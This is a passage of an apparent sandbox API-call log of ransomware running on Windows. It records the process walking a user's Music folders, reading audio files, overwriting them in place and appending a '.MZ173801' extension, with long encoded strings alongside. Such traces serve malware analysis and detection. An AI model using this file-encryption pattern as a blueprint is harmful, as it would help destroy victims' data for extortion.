lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.687] GetCurrentThreadId () returned 0x1358 [0117.687] GetCurrentThreadId () returned 0x1358 [0117.687] GetCurrentThreadId () returned 0x1358 [0117.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.688] GetCurrentThreadId () returned 0x1358 [0117.688] GetCurrentThreadId () returned 0x1358 [0117.688] GetCurrentThreadId () returned 0x1358 [0117.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\C5CIxe6\\62UWGU5J91LxoED4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\c5cixe6\\62uwgu5j91lxoed4.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.688] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee74*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee74*=0) returned 0x0 [0117.688] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.688] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0xfcb3 [0117.688] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.688] ReadFile (in: hFile=0x40c, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0xfcb3, lpNumberOfBytesRead=0x19ee80, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19ee80*=0xfcb3, lpOverlapped=0x0) returned 1 [0117.689] CloseHandle (hObject=0x40c) returned 1 [0117.690] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\C5CIxe6\\62UWGU5J91LxoED4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\c5cixe6\\62uwgu5j91lxoed4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.692] WriteFile (in: hFile=0x40c, lpBuffer=0x23b47d0*, nNumberOfBytesToWrite=0xfcb3, lpNumberOfBytesWritten=0x19ee8c, lpOverlapped=0x0 | out: lpBuffer=0x23b47d0*, lpNumberOfBytesWritten=0x19ee8c*=0xfcb3, lpOverlapped=0x0) returned 1 [0117.705] CloseHandle (hObject=0x40c) returned 1 [0117.707] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\C5CIxe6\\62UWGU5J91LxoED4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\c5cixe6\\62uwgu5j91lxoed4.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\C5CIxe6\\62UWGU5J91LxoED4.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\uo40eiturrduo\\c5cixe6\\62uwgu5j91lxoed4.mp3.mz173801")) returned 1 [0117.744] GetCurrentThreadId () returned 0x1358 [0117.744] GetCurrentThreadId () returned 0x1358 [0117.744] GetCurrentThreadId () returned 0x1358 [0117.744] GetCurrentThreadId () returned 0x1358 [0117.744] GetCurrentThreadId () returned 0x1358 [0117.746] GetCurrentThreadId () returned 0x1358 [0117.746] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a92b240, ftCreationTime.dwHighDateTime=0x1d5e41b, ftLastAccessTime.dwLowDateTime=0xf91cdf0, ftLastAccessTime.dwHighDateTime=0x1d5e4a8, ftLastWriteTime.dwLowDateTime=0xf91cdf0, ftLastWriteTime.dwHighDateTime=0x1d5e4a8, nFileSizeHigh=0x0, nFileSizeLow=0xfcb3, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="62UWGU5J91LxoED4.mp3", cAlternateFileName="62UWGU~1.MP3")) returned 0 [0117.746] GetLastError () returned 0x12 [0117.746] FindClose (in: hFindFile=0xa1bb60 | out: hFindFile=0xa1bb60) returned 1 [0117.753] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\C5CIxe6\\*.*", lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbbfb0860, ftCreationTime.dwHighDateTime=0x1d5e280, ftLastAccessTime.dwLowDateTime=0xa76da2cd, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa76da2cd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bb60 [0117.753] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef30 | out: lpLocalFileTime=0x19ef30) returned 1 [0117.753] FileTimeToDosDateTime (in: lpFileTime=0x19ef30, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.753] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbbfb0860, ftCreationTime.dwHighDateTime=0x1d5e280, ftLastAccessTime.dwLowDateTime=0xa76da2cd, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa76da2cd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0117.753] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.753] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.753] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a92b240, ftCreationTime.dwHighDateTime=0x1d5e41b, ftLastAccessTime.dwLowDateTime=0xf91cdf0, ftLastAccessTime.dwHighDateTime=0x1d5e4a8, ftLastWriteTime.dwLowDateTime=0xa76da2cd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xfcb3, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="62UWGU5J91LxoED4.mp3.MZ173801", cAlternateFileName="62UWGU~1.MZ1")) returned 1 [0117.753] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.753] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.753] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a92b240, ftCreationTime.dwHighDateTime=0x1d5e41b, ftLastAccessTime.dwLowDateTime=0xf91cdf0, ftLastAccessTime.dwHighDateTime=0x1d5e4a8, ftLastWriteTime.dwLowDateTime=0xa76da2cd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xfcb3, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="62UWGU5J91LxoED4.mp3.MZ173801", cAlternateFileName="62UWGU~1.MZ1")) returned 0 [0117.753] GetLastError () returned 0x12 [0117.753] FindClose (in: hFindFile=0xa1bb60 | out: hFindFile=0xa1bb60) returned 1 [0117.754] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a32cd40, ftCreationTime.dwHighDateTime=0x1d5e21f, ftLastAccessTime.dwLowDateTime=0x47c2db70, ftLastAccessTime.dwHighDateTime=0x1d5ea0b, ftLastWriteTime.dwLowDateTime=0xa76b3ff1, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xde30, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="GuM0xcHUsONHLGItnv.wav.MZ173801", cAlternateFileName="GUM0XC~1.MZ1")) returned 1 [0117.754] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.754] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.754] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a32cd40, ftCreationTime.dwHighDateTime=0x1d5e21f, ftLastAccessTime.dwLowDateTime=0x47c2db70, ftLastAccessTime.dwHighDateTime=0x1d5ea0b, ftLastWriteTime.dwLowDateTime=0xa76b3ff1, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xde30, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="GuM0xcHUsONHLGItnv.wav.MZ173801", cAlternateFileName="GUM0XC~1.MZ1")) returned 0 [0117.754] GetLastError () returned 0x12 [0117.754] FindClose (in: hFindFile=0xa1be00 | out: hFindFile=0xa1be00) returned 1 [0117.754] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0x51bcc6b0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x51bcc6b0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="uO40eItURrDuO", cAlternateFileName="UO40EI~1")) returned 0 [0117.754] GetLastError () returned 0x12 [0117.754] FindClose (in: hFindFile=0xa1bd58 | out: hFindFile=0xa1bd58) returned 1 [0117.754] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4635c0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x6a584e40, ftLastAccessTime.dwHighDateTime=0x1d5f0fa, ftLastWriteTime.dwLowDateTime=0x6a584e40, ftLastWriteTime.dwHighDateTime=0x1d5f0fa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="3MH4hI_B2Y4fI4Q-s4O", cAlternateFileName="3MH4HI~1")) returned 1 [0117.754] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0117.754] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0117.754] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4635c0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x6a584e40, ftLastAccessTime.dwHighDateTime=0x1d5f0fa, ftLastWriteTime.dwLowDateTime=0x6a584e40, ftLastWriteTime.dwHighDateTime=0x1d5f0fa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bcb0 [0117.754] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb4635c0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x6a584e40, ftLastAccessTime.dwHighDateTime=0x1d5f0fa, ftLastWriteTime.dwLowDateTime=0x6a584e40, ftLastWriteTime.dwHighDateTime=0x1d5f0fa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0117.754] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06419c0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xe448e0e0, ftLastAccessTime.dwHighDateTime=0x1d5ead6, ftLastWriteTime.dwLowDateTime=0xe448e0e0, ftLastWriteTime.dwHighDateTime=0x1d5ead6, nFileSizeHigh=0x0, nFileSizeLow=0xd5da, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="0ANPHQ2sWdNCoQ54jO.m4a", cAlternateFileName="0ANPHQ~1.M4A")) returned 1 [0117.754] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0117.754] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.754] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0ANPHQ2sWdNCoQ54jO.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0anphq2swdncoq54jo.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06419c0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xe448e0e0, ftLastAccessTime.dwHighDateTime=0x1d5ead6, ftLastWriteTime.dwLowDateTime=0xe448e0e0, ftLastWriteTime.dwHighDateTime=0x1d5ead6, nFileSizeHigh=0x0, nFileSizeLow=0xd5da)) returned 1 [0117.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.755] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.755] GetCurrentThreadId () returned 0x1358 [0117.755] GetCurrentThreadId () returned 0x1358 [0117.755] GetCurrentThreadId () returned 0x1358 [0117.756] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 